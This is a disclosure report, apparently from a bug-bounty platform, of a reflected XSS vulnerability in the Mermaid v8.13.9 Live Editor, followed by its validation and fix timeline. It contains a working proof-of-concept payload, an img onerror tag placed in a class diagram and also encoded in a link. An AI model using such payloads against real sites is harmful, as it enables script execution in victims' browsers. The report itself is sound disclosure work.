/

Cross-site Scripting (XSS) - Reflected in mermaid-js/mermaid-live-editor

Valid

Reported on

Jan 20th 2022

Description

There is a reflected XSS vulnerability in Mermaid v8.13.9 Live Editor. It is fixed in Mermaid develop Branch -> https://github.com/mermaid-js/mermaid/commit/44d7dfe9932c002d06330086e8b296ee095e5517

Proof of Concept

Open following link:

https://mermaid.live/edit#eyJjb2RlIjoiY2xhc3NEaWFncmFtXG4gICAgQW5pbWFsIDx8LS0gRHVja1xuICAgIEFuaW1hbCA8fC0tIEZpc2hcbiAgICBBbmltYWwgPHwtLSBaZWJyYVxuICAgIEFuaW1hbCA6ICtpbnQgYWdlXG4gICAgQW5pbWFsIDogK1N0cmluZyBnZW5kZXJcbiAgICBBbmltYWw6ICtpc01hbW1hbCgpXG4gICAgQW5pbWFsOiArbWF0ZSgpXG4gICAgY2xhc3MgRHVja3tcbiAgICAgIDw8PGltZy9zcmM9J3gnL29uZXJyb3I9YWxlcnQoMSk-Pj5cbiAgICAgICtTdHJpbmcgYmVha0NvbG9yXG4gICAgICArc3dpbSgpXG4gICAgICArcXVhY2soKVxuICAgIH1cbiAgICBjbGFzcyBGaXNoe1xuICAgICAgLWludCBzaXplSW5GZWV0XG4gICAgICAtY2FuRWF0KClcbiAgICB9XG4gICAgY2xhc3MgWmVicmF7XG4gICAgICArYm9vbCBpc193aWxkXG4gICAgICArcnVuKClcbiAgICB9XG4gICAgICAgICAgICAiLCJtZXJtYWlkIjoie1xuICBcInRoZW1lXCI6IFwiZGVmYXVsdFwiXG59IiwidXBkYXRlRWRpdG9yIjpmYWxzZSwiYXV0b1N5bmMiOnRydWUsInVwZGF0ZURpYWdyYW0iOmZhbHNlfQ

Or copy & paste following in Mermaid v8.13.9 Live Editor:

classDiagram
    class Duck{
      <<<img/src='x'/onerror=alert(1)>>>
      +String beakColor
      +swim()
      +quack()
    }

Impact

Execute Javascript

We are processing your report and will contact the mermaid-js/mermaid-live-editor team within 24 hours. a year ago

We have contacted a member of the mermaid-js/mermaid-live-editor team and are waiting to hear back a year ago

Sidharth Vinod validated this vulnerability a year ago

chb9 has been awarded the disclosure bounty

The fix bounty is now up for grabs

Knut Sveidqvist marked this as fixed in 8.13.10 with commit 4a6a49 a year ago

Knut Sveidqvist has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation

We are processing your report and will contact the mermaid-js/mermaid-live-editor team within 24 hours. a year ago

We have contacted a member of the mermaid-js/mermaid-live-editor team and are waiting to hear back a year ago

Sidharth Vinod validated this vulnerability a year ago

chb9 has been awarded the disclosure bounty

The fix bounty is now up for grabs

Knut Sveidqvist marked this as fixed in 8.13.10 with commit 4a6a49 a year ago

Knut Sveidqvist has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation